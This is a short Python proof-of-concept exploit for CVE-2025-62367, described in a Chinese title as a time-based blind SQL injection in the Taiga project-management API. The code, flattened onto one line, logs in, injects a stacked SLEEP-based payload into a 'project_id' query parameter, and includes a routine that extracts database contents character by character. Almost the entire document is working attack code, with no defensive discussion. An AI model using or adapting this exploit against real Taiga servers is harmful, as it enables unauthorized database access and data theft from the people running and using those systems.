CVE-2025-62367 Taiga项目管理系统API盲注SQL注入漏洞

import requests import time # CVE-2025-62367 PoC - Time-based Blind SQL Injection in Taiga API # Target: Taiga instance with vulnerable API endpoint TARGET_URL = "http://target-server/api/v1/" USERNAME = "[email protected]" PASSWORD = "password123" def login(): """Authenticate and get session token""" session = requests.Session() login_data = {"username": USERNAME, "password": PASSWORD} response = session.post(f"{TARGET_URL}auth/ login", json=login_data) return session if response.status_code == 200 else None def sql_injection_test(session, payload): """Test SQL injection with time-based payload""" # Inject time-based SQL payload in vulnerable parameter params = {"project_id": f"1; SELECT CASE WHEN ({payload}) THEN SLEEP(5) ELSE 0 END--"} start_time = time.time() response = session.get(f"{TARGET_URL}projects/", params=params) elapsed = time.time() - start_time return elapsed > 5 def extract_data(session): """Extract sensitive data using blind SQL injection""" # Example: Extract database version character by character extracted = "" charset = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" for pos in range(1, 20): for char in charset: payload = f"(SELECT SUBSTRING(@@version,{pos},1)='{char}')" if sql_injection_test(session, payload): extracted += char break return extracted if __name__ == "__main__": session = login() if session: print("[*] Testing CVE-2025-62367") if sql_injection_test(session, "1=1"): print("[!] Vulnerable to SQL Injection") else: print("[-] Not vulnerable or patched")